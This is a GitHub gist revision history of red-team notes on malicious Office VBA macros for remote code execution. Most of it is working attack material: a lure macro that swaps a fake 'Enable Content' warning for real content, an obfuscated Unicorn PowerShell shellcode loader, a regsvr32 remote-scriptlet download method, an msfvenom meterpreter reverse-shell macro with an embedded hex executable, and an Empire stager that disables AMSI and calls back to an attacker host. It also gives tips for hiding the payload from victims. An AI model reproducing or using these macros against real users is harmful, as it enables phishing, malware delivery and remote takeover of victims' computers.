    & "AWgBCAFMASQAvAHcASABGAFEALwBYAE8ANABPAFcAKwBBAHMAVwBuAHQAYgArAFIAdgBnAHAAWgByAFgAQwBFAHcAbQArAHkAbgB4AGYAKwBFAGQAYgAvAEQAbwBjAEIAcABnAEwAVQBiAGIAaQBMAEcATgBsADMAegBSAGYAaABPAFAARABuADYATgBQAGoASwBXAFgAQQBFAGUALwB3AHAAQgArAEIATgA0AGsANABiAGMATgAzAHkAVgArAGQAQgB" _
    & "SADEAQQBmAFEAbwBBAEEAQQA9AD0AJwAnACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGU" _
    & "AcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7ACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZAB" _
    & "PAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHI" _
    & "AdAAoACQAcwApADsA"
    Call Shell(rkEsZ, vbHide)
    End Sub
    Sub AutoOpen()
    pm6HSAm
    End Sub
    Sub Workbook_Open()
    pm6HSAm
    End Sub
    ```

    ---


    **5. `Empire` generated `windows/macro` stager**

    The **PowerShell Empire** can also provide MS Office Macro as a stager for our listener.

  11. @mgeeky mgeeky revised this gist Aug 21, 2017. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion Various-Macro-Based-RCEs.md
    View file
    Original file line number Diff line number Diff line change
    @@ -362,7 +362,7 @@ As the macro's comment suggest, the long blob of bytes at the end of this script
    ---


    **4. `Empire` generated `windows/macro` stager **
    **4. `Empire` generated `windows/macro` stager**

    The **PowerShell Empire** can also provide MS Office Macro as a stager for our listener.

  12. @mgeeky mgeeky revised this gist Aug 21, 2017. 1 changed file with 98 additions and 0 deletions.
    98 changes: 98 additions & 0 deletions Various-Macro-Based-RCEs.md
    View file
    Original file line number Diff line number Diff line change
    @@ -10,6 +10,7 @@ List:
    1. The [Unicorn](https://github.com/trustedsec/unicorn) **Powershell** based payload
    2. `regsvr32` based method
    3. Metasploit generated payload `vba-exe`
    4. `Empire` generated `windows/macro` stager


    ---
    @@ -360,3 +361,100 @@ As the macro's comment suggest, the long blob of bytes at the end of this script

    ---


    **4. `Empire` generated `windows/macro` stager **

    The **PowerShell Empire** can also provide MS Office Macro as a stager for our listener.

    In order to acquire such stager we can follow the following steps (for Empire 2.0):

    - `uselistener http`
    - `set Host 192.168.56.101`
    - `main`
    - `usestager windows/macro`
    - `set Listener http`
    - `execute`

    The resulting Macro will be of form:

    ```
    Sub AutoOpen()
    Debugging
    End Sub
    Sub Document_Open()
    Debugging
    End Sub
    Public Function Debugging() As Variant
    Dim Str As String
    str = "powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ"
    str = str + "BzAHMARQBtAEIAbABZAC4ARwBFAFQAVABZAFAARQAoACcAUwB5"
    str = str + "AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AH"
    str = str + "QAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcA"
    str = str + "KQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAdABGAGkARQ"
    str = str + "BMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAn"
    str = str + "ACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjAC"
    str = str + "cAKQAuAFMARQBUAFYAYQBsAFUAZQAoACQATgB1AGwAbAAsACQA"
    str = str + "VABSAHUARQApAH0AOwBbAFMAWQBTAFQARQBNAC4ATgBFAHQALg"
    str = str + "BTAEUAcgB2AGkAQwBlAFAAbwBpAE4AVABNAEEAbgBBAGcARQBS"
    str = str + "AF0AOgA6AEUAWABQAEUAQwB0ADEAMAAwAEMATwBuAFQAaQBOAF"
    str = str + "UAZQA9ADAAOwAkAFcAYwA9AE4AZQB3AC0ATwBCAGoARQBDAHQA"
    str = str + "IABTAFkAUwB0AGUAbQAuAE4AZQBUAC4AVwBFAGIAQwBMAEkAZQ"
    str = str + "BOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAg"
    str = str + "ACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE"
    str = str + "8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAA"
    str = str + "cgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbw"
    str = str + "AnADsAJABXAGMALgBIAEUAYQBkAGUAUgBzAC4AQQBkAGQAKAAn"
    str = str + "AFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAE"
    str = str + "MALgBQAHIATwB4AFkAPQBbAFMAWQBTAHQARQBNAC4ATgBFAHQA"
    str = str + "LgBXAGUAYgBSAEUAUQB1AGUAUwB0AF0AOgA6AEQARQBmAEEAVQ"
    str = str + "BsAFQAVwBFAGIAUABSAG8AWAB5ADsAJAB3AGMALgBQAFIATwB4"
    str = str + "AHkALgBDAHIARQBEAEUAbgB0AGkAYQBMAFMAIAA9ACAAWwBTAH"
    str = str + "kAcwBUAGUATQAuAE4AZQBUAC4AQwByAGUARABlAG4AdABpAGEA"
    str = str + "bABDAGEAYwBIAEUAXQA6ADoARABFAGYAYQB1AEwAdABOAEUAVA"
    str = str + "BXAG8AcgBrAEMAUgBlAEQARQBuAHQASQBBAEwAcwA7ACQASwA9"
    str = str + "AFsAUwBZAFMAdABFAE0ALgBUAEUAeABUAC4ARQBOAEMAbwBEAG"
    str = str + "kAbgBHAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AEUA"
    str = str + "cwAoACcAdwBKADEAcwBaAD8AKgA1AFcAOgBuAFYAaQBlADsANg"
    str = str + "A4AHkAfABVACwAfgBGACUAMgBYAEgAMABBACkASQB7ACcAKQA7"
    str = str + "ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIARwBzADsAJABTAD"
    str = str + "0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoA"
    str = str + "PQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJA"
    str = str + "BLAC4AQwBvAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABf"
    str = str + "AF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAF"
    str = str + "sAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEA"
    str = str + "KQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQ"
    str = str + "ApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABd"
    str = str + "AD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAE"
    str = str + "IAWABPAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQA"
    str = str + "SABdACkAJQAyADUANgBdAH0AfQA7ACQAVwBDAC4ASABlAGEAZA"
    str = str + "BlAFIAcwAuAEEARABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBz"
    str = str + "AGUAcwBzAGkAbwBuAD0AYgBTAG8ASgBUAHMAOAA2AEsANQBvAF"
    str = str + "kAcwBLAEUATwBmAC8ASwAxADUAYwArADkASQBvAGMAPQAiACkA"
    str = str + "OwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQ"
    str = str + "A2ADgALgA1ADYALgAxADAAMQA6ADgAMAAnADsAJAB0AD0AJwAv"
    str = str + "AGwAbwBnAGkAbgAvAHAAcgBvAGMAZQBzAHMALgBwAGgAcAAnAD"
    str = str + "sAJABkAEEAdABhAD0AJABXAEMALgBEAG8AdwBuAEwAbwBhAGQA"
    str = str + "RABhAHQAQQAoACQAcwBFAFIAKwAkAFQAKQA7ACQASQBWAD0AJA"
    str = str + "BEAGEAVABhAFsAMAAuAC4AMwBdADsAJABEAEEAVABhAD0AJABE"
    str = str + "AEEAdABBAFsANAAuAC4AJABkAEEAVABBAC4ATABlAE4AZwBUAE"
    str = str + "gAXQA7AC0AagBPAGkAbgBbAEMAaABBAFIAWwBdAF0AKAAmACAA"
    str = str + "JABSACAAJABEAGEAdABBACAAKAAkAEkAVgArACQASwApACkAfA"
    str = str + "BJAEUAWAA="
    Const HIDDEN_WINDOW = 0
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objProcess.Create str, Null, objConfig, intProcessID
    End Function
    ```

    Obviously we can enhance it any further as we wish, as well as obfuscate it little bit further.


    ---

  13. @mgeeky mgeeky revised this gist Aug 21, 2017. 1 changed file with 112 additions and 1 deletion.
    113 changes: 112 additions & 1 deletion Various-Macro-Based-RCEs.md
    View file
    Original file line number Diff line number Diff line change
    @@ -4,6 +4,14 @@ Nothing new or fancy here, just a list of techniques, tools and scripts collecte

    _All of the below examples had been generated for using as a remote address: **192.168.56.101**._

    List:

    0. Page substiution macro for luring user to click _Enable Content_
    1. The [Unicorn](https://github.com/trustedsec/unicorn) **Powershell** based payload
    2. `regsvr32` based method
    3. Metasploit generated payload `vba-exe`


    ---

    **0. Page substiution macro for luring user to click _Enable Content_**
    @@ -248,4 +256,107 @@ So the entire attack goes as follows:
    ---


    **3. **
    **3. Metasploit generated payload `vba-exe`**

    In this method, we leverage the Metasploit's `msfvenom` utility to generate a `vba-exe` payload that consists of two parts:

    - A macro that shall be pasted in `Auto_Open` function
    - An exe file encoded in form of "&H" hex chars long blob.

    We can generate this macro as follows:

    ```
    work|16:42|~ # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=443 -f vba-exe
    ```

    Then we will get the following output:
    ```
    '**************************************************************
    '*
    '* This code is now split into two pieces:
    '* 1. The Macro. This must be copied into the Office document
    '* macro editor. This macro will run on startup.
    '*
    '* 2. The Data. The hex dump at the end of this output must be
    '* appended to the end of the document contents.
    '*
    '**************************************************************
    '*
    '* MACRO CODE
    '*
    '**************************************************************
    Sub Auto_Open()
    Ctjwp12
    End Sub
    Sub Ctjwp12()
    Dim Ctjwp7 As Integer
    Dim Ctjwp1 As String
    Dim Ctjwp2 As String
    Dim Ctjwp3 As Integer
    Dim Ctjwp4 As Paragraph
    Dim Ctjwp8 As Integer
    Dim Ctjwp9 As Boolean
    Dim Ctjwp5 As Integer
    Dim Ctjwp11 As String
    Dim Ctjwp6 As Byte
    Dim Vvdicidvtv as String
    Vvdicidvtv = "Vvdicidvtv"
    Ctjwp1 = "EVVVfVKLSHcv.exe"
    Ctjwp2 = Environ("USERPROFILE")
    ChDrive (Ctjwp2)
    ChDir (Ctjwp2)
    Ctjwp3 = FreeFile()
    Open Ctjwp1 For Binary As Ctjwp3
    For Each Ctjwp4 in ActiveDocument.Paragraphs
    DoEvents
    Ctjwp11 = Ctjwp4.Range.Text
    If (Ctjwp9 = True) Then
    Ctjwp8 = 1
    While (Ctjwp8 < Len(Ctjwp11))
    Ctjwp6 = Mid(Ctjwp11,Ctjwp8,4)
    Put #Ctjwp3, , Ctjwp6
    Ctjwp8 = Ctjwp8 + 4
    Wend
    ElseIf (InStr(1,Ctjwp11,Vvdicidvtv) > 0 And Len(Ctjwp11) > 0) Then
    Ctjwp9 = True
    End If
    Next
    Close #Ctjwp3
    Ctjwp13(Ctjwp1)
    End Sub
    Sub Ctjwp13(Ctjwp10 As String)
    Dim Ctjwp7 As Integer
    Dim Ctjwp2 As String
    Ctjwp2 = Environ("USERPROFILE")
    ChDrive (Ctjwp2)
    ChDir (Ctjwp2)
    Ctjwp7 = Shell(Ctjwp10, vbHide)
    End Sub
    Sub AutoOpen()
    Auto_Open
    End Sub
    Sub Workbook_Open()
    Auto_Open
    End Sub
    '**************************************************************
    '*
    '* PAYLOAD DATA
    '*
    '**************************************************************
    Vvdicidvtv
    &H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H45&H00&H00&H4C&H01&H03&H00&H8F&HC9&H1C&H93&H00&H00&H00&H00&H00&H00&H00&H00&HE0&H00&H0F&H03&H0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&H00&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H10&H00&H00&H00&H20&H00&H00&H00&H00&H40&H00&H00&H10&H00&H00&H00&H02&H00&H00&H04&H00&H00&H00&H01&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H02&H00&H00&H46&H3A&H00&H00&H02&H00&H00&H00&H00&H00&H20&H00&H00&H10&H00&H00&H00&H00&H10&H00&H00&H10&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H30&H00&H00&H64&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
    [...]
    &H0D&H55&H20&H4D&H57
    ```

    As the macro's comment suggest, the long blob of bytes at the end of this script have to be simply pasted to the document's contents (one of Active document's Paragraphs). In order to avoid suspitions one can set a white colored font of smallest possible size to avoid lurking at the blob.

    ---

  14. @mgeeky mgeeky revised this gist Aug 21, 2017. 1 changed file with 14 additions and 1 deletion.
    15 changes: 14 additions & 1 deletion Various-Macro-Based-RCEs.md
    View file
    Original file line number Diff line number Diff line change
    @@ -95,6 +95,9 @@ The use case scenario goes as follows:
    - The user clicks the _"Enable Content"_ and the above macro gets executed firstly, making a page switch by deleting the fake warning message and pasting everything what has been stored in this very document in **AutoText** called `RealDoc`.


    ---



    **1. The [Unicorn](https://github.com/trustedsec/unicorn) **Powershell** based payload**

    @@ -169,6 +172,9 @@ End Sub
    ```


    ---


    **2. `regsvr32` based method**

    This method works by making built-in Microsoft tool named `regsvr32` that is used for registering and unregistering OLE Controls / ActiveX objects even from remote resources in a form of **scriptlet** files (`.sct`). By leveraging that feature we can supply remotely hosted (on the attacker-controlled web server) malicious _scriptlet_ file that would after being loaded execute arbitrary commands on the victim's machine.
    @@ -234,5 +240,12 @@ End Sub

    So the entire attack goes as follows:

    Malicious document with `Run("regsvr32 [...] /i:http://[...]/file.sct")` -> `file.sct` delivers Powershell Download & Exec command (`backdoor`) -> `backdoor` Powershell CMD reverse tcp 2nd stage gets delivered and executed
    - Malicious document with `Run("regsvr32 [...] /i:http://[...]/file.sct")`
    - `file.sct` delivers Powershell Download & Exec command (`backdoor`)
    - `backdoor` Powershell CMD reverse tcp 2nd stage gets delivered and executed


    ---


    **3. **
  15. @mgeeky mgeeky created this gist Aug 21, 2017.
    238 changes: 238 additions & 0 deletions Various-Macro-Based-RCEs.md
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,238 @@
    This is a note for myself describing various Visual Basic macros construction techniques that could be used for remote code execution via malicious Document vector.
    Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.


    _All of the below examples had been generated for using as a remote address: **192.168.56.101**._

    ---

    **0. Page substiution macro for luring user to click _Enable Content_**

    One can use the [following macro](https://gist.github.com/mgeeky/3c705560c5041ab20c62f41e917616e6) for implementing a document-contents switch after luring user to click "Enable Content":

    ```
    Public alreadyLaunched As Integer
    Private Sub Malware()
    '
    ' ============================================
    '
    ' Enter here your malware code here.
    ' It will be started on auto open surely.
    '
    ' ============================================
    MsgBox ("Here comes the malware!")
    ' ============================================
    End Sub
    Private Sub Launch()
    If alreadyLaunched = True Then
    Exit Sub
    End If
    Malware
    SubstitutePage
    alreadyLaunched = True
    End Sub
    Private Sub SubstitutePage()
    '
    ' This routine will take the entire Document's contents,
    ' delete them and insert in their place contents defined in
    ' INSERT -> Quick Parts -> AutoText -> named as in `autoTextTemplateName`
    '
    Dim doc As Word.Document
    Dim firstPageRange As Range
    Dim rng As Range
    Dim autoTextTemplateName As String
    ' This is the name of the defined AutoText prepared in the document,
    ' to be inserted in place of previous contents.
    autoTextTemplateName = "RealDoc"
    Set firstPageRange = Word.ActiveDocument.Range
    firstPageRange.Select
    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1
    Set doc = ActiveDocument
    Set rng = doc.Sections(1).Range
    doc.AttachedTemplate.AutoTextEntries(autoTextTemplateName).Insert rng, True
    doc.Save
    End Sub
    Sub AutoOpen()
    ' Becomes launched as first on MS Word
    Launch
    End Sub
    Sub Document_Open()
    ' Becomes launched as second, another try, on MS Word
    Launch
    End Sub
    Sub Auto_Open()
    ' Becomes launched as first on MS Excel
    Launch
    End Sub
    Sub Workbook_Open()
    ' Becomes launched as second, another try, on MS Excel
    Launch
    End Sub
    ```

    The use case scenario goes as follows:

    - We want the victim to click _"Enable Content"_ to get our macro code executed
    - To do so, we prepare a fake "Need to Enable Content" message like compatibility issues, AV triggered flag or alike
    - Then we place **entire real document contents** in an **AutoText** named `RealDoc` (Office ribbon -> INSERT -> Quick Parts -> AutoTexts -> name it: `RealDoc`)
    - The user clicks the _"Enable Content"_ and the above macro gets executed firstly, making a page switch by deleting the fake warning message and pasting everything what has been stored in this very document in **AutoText** called `RealDoc`.



    **1. The [Unicorn](https://github.com/trustedsec/unicorn) **Powershell** based payload**

    This payload uses downgraded **Powershell.exe** command-line invocation that will download 2nd stage from the remote server and execute it on the owned machine.
    The downside of this method is the fact that the `Unicorn` script generates only **Powershell.exe** related payload and also adds a MsgBox with english message stating that the Excel/Word application needs to be closed. Only then the payload gets launched properly.

    **Example script:**

    ```
    Private Sub Document_Open()
    Test
    End Sub
    Private Sub DocumentOpen()
    Test
    End Sub
    Private Sub Auto_Open()
    Test
    End Sub
    Private Sub AutoOpen()
    Test
    End Sub
    Private Sub Auto_Exec()
    Test
    End Sub
    Sub Test()
    Dim HsQgOKMOa
    HsQgOKMOa = "-w 1 -C ""sv xW -;sv PrZ ec;sv dyS ((gv xW).value.toString()+(gv PrZ).value.toString());" & "p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & " (gv dyS).value.toString() ('JABDAEgAeAAgAD0AIAAnACQAdQB4AHIAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgA" _
    & "gAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGw'+'AbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABU" _
    & "AGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AG'+'kAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsA" _
    & "CIAKQBdA'+'HAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAdQB4AHIAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBu'+'AGEAbQBlAHMAcABhAGMAZQAgAFcAaQB" _
    & "uADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZAA5ACwAMAB4AGMANQAsADAAeABiAGQALAAwAHgAMQBhACwAMAB4ADYAMAAsADAAeABkAGIALAAwAHgAMgA3ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMwAzACwAMAB4AGMAOQA'+'sADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA2AGUALAAwAHgAMQA4ACwAMAB4" _
    & "ADAAMwAsADAAeAA2AGUALAAwAHgAMQA4ACwAMAB4ADgAMwAsADAAeABjADYALAAwAHgAMQBlACwAMAB4ADgAMgAsADAAeAAyAGUALAAwAHgAZABiACwAMAB4AGYANgAsADAAeABjADAALAAwAHgAZAAxACwAMAB4ADIANAAsADAAeAAwADYALAAwAHgAYQA1ACwAMAB4ADUAOAAsADAAeABjADEALAAwAHgAMwA3ACwAMAB4AGUANQAsADAAeAAzAGYALA'+'AwAHgAOAAxACwAMAB4ADYANwAsADAAeABkADUALAAwAHgAMwA0ACwAMAB4AGMANwAsADAAeAA4AGIALAAwAHgAOQBlACwAMAB4ADEAOQAsADAAeABmA" _
    & "GMALAAwAHgAMQA4ACwAMAB4AGQAMgAsADAAeABiADUALAAwAHgAZgAzACwAMAB4AGEAOQAsADAAeAA1ADkALAAwAHgAZQAwACwAMAB4ADMAYQAsADAAeAAyAGEALAAwAHgAZgAxACwAMAB4AGQAMAAsADAAeAA1AGQALAAwAHgAYQA4ACwAMAB4ADAAOAAsADAAeAAwADUALAAwAHgAYgBlACwAM'+'AB4ADkAMQAsADAAeABjADIALAAwAHgANQA4ACwAMAB4AGIAZgAsADAAeABkADYALAAwAHgAMwBmACwAMAB4ADkAMAAsADAAeABlAGQALAAwAHgAOABmACwAMAB4ADMANAAsADAAeAAwADcALAAwAHgAMAAyAC" _
    & "wAMAB4AGEANAAsADAAeAAwADEALAAwAHgAOQA0ACwAMAB4AGEAOQAsADAAeABmADYALAAwAHgAOAA0ACwAMAB4ADkAYwAsADAAeAA0AGUALAAwAHgANABlACwAMAB4AGEANgAsADAAeAA4AGQALAAwAHgAYwAwACwAMAB4AGMANQAsADAA'+'eABmADEALAAwAHgAMABkACwAMAB4AGUAMgAsADAAeAAwAGEALAAwAHgAOABhACwAMAB4ADAANwAsADAAeABmAGMALAAwAHgANABmACwAMAB4AGIANwAsADAAeABkAGUALAAwAHgANwA3ACwAMAB4AGIAYgAsADAAeAA0ADMALAAwAHgAZQAxACwAMAB4ADUAMQAsADA" _
    & "AeABmADIALAAwAHgAYQBjACwAMAB4ADQAZQAsADAAeAA5AGMALAAwAHgAMwBiACwAMAB4ADUAZgAsADAAeAA4AGUALAAwAHgAZAA4ACwAMAB4AGYAYgAsADAAeAA4ADAALAAwAHg'+'AZQA1ACwAMAB4ADEAMAAsADAAeABmADgALAAwAHgAMwBkACwAMAB4AGYAZQAsADAAeABlADYALAAwAHgAOAAzACwAMAB4ADkAOQAsADAAeAA4AGIALAAwAHgAZgBjACwAMAB4ADIAMwAsADAAeAA2ADkALAAwAHgAMgBiACwAMAB4AGQAOQAsADAAeABkADIALAAwAHgAYgBlACwAMAB4AGEAYQAsADAAeABhAGEALAAwAHgA" _
    & "ZAA4ACwAMAB4ADAAYgAsADAAeABiADgALAAwAHgAZgA1ACwAMAB4AGYAYwAsADAAeAA4AGEALAAwAHgANgBkACwAMAB4AD'+'gAZQAsADAAeABmADgALAAwAHgAMAA3ACwAMAB4ADkAMAAsADAAeAA0ADEALAAwAHgAOAA5ACwAMAB4ADUAYwAsADAAeABiADcALAAwAHgANAA1ACwAMAB4AGQAMgAsADAAeAAwADcALAAwAHgAZAA2ACwAMAB4AGQAYwAsADAAeABiAGUALAAwAHgAZQA2ACwAMAB4AGUANwAsADAAeAAzAGYALAAwAHgANgAxACwAMAB4ADUANgAsADAAeAA0ADIALAAwAHgANABiACwAMAB4ADgAZ" _
    & "gAsADAAeAA4ADMALAAwAHgAZgBmACwAMAB4ADEANgAsADAAeABjA'+'DcALAAwAHgANgAwACwAMAB4ADMAMgAsADAAeABhADkALAAwAHgAMQA3ACwAMAB4AGUAZgAsADAAeAA0ADUALAAwAHgAZABhACwAMAB4ADIANQAsADAAeABiADAALAAwAHgAZgBkACwAMAB4ADcANAAsADAAeAAwADUALAAwAHgAMwA5ACwAMAB4AGQAOAAsADAAeAA4ADMALAAwAHgANgBhACwAMAB4ADEAMAAsADAAeAA5AGMALAAwAHgAMQBjACwAMAB4ADkANQAsADAAeAA5AGIALAAwAHgAZABkACwAMAB4ADMANQAsADAAeAA1ADEALA" _
    & "AwAHgAYwBm'+'ACwAMAB4ADgAZAAsADAAeAAyAGQALAAwAHgANwAwACwAMAB4ADcAMAAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4ADcAZAAsADAAeABhADUALAAwAHgAZgAzACwAMAB4AGEAYgAsADAAeABlADkALAAwAHgAOAA2ACwAMAB4AGEAYwAsADAAeAA4AGMALAAwAHgAOABjACwAMAB4ADYAZQAsADAAeABhAGYALAAwAHgAZQBjACwAMAB4ADQAZgAsADAAeABkADQALAAwAHgAMgA2ACwAMAB4ADAAYQAsADAAeAAxAGYALAAwAHgANwBhACwAMAB4ADYAOQA'+'sADAAeAA4ADMALAAwAHgAZABmACwA" _
    & "MAB4ADIAYQAsADAAeABjADkALAAwAHgANwAzACwAMAB4AGIANwAsADAAeAAyADAALAAwAHgAYwA2ACwAMAB4AGEAYwAsADAAeABhADcALAAwAHgANABhACwAMAB4ADAAYwAsADAAeABjADUALAAwAHgANABkACwAMAB4AGEANQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4AGYAOQAsADAAeAA1AGMALAAwAHgAYQAwACwAMAB4ADMANgAsADAAeAA5ADgALAAwAHgAYQAxACwAMAB4ADcAZQAsADAAeAAzADMALA'+'AwAHgAOQBhACwAMAB4ADIAYQAsADAAeAA4AGQALAAwAHgAYwAzACwAMAB4ADUANAAsADAAe" _
    & "ABkAGIALAAwAHgAZgA4ACwAMAB4AGQANwAsADAAeAAwADAALAAwAHgAMgBiACwAMAB4AGIANwAsADAAeAA4AGEALAAwAHgAOAA2ACwAMAB4ADMANAAsADAAeAA2AGQALAAwAHgAYQAwACwAMAB4ADIANgAsADAAeABhADEALAAwAHgAOABhACwAMAB4ADYAMwAsADAAeAA3ADEALAAwAHgANQBkACwAMAB4ADkAMQAsADAAeAA1ADIALAAwAHgAYgA1ACwAM'+'AB4AGMAMgAsADAAeAA2AGEALAAwAHgAYgAxACwAMAB4AGMAZQAsADAAeABjAGIALAAwAHgAZgBlACwAMAB4ADcAYQAsADAAeABiADgALAAwAHgAMw" _
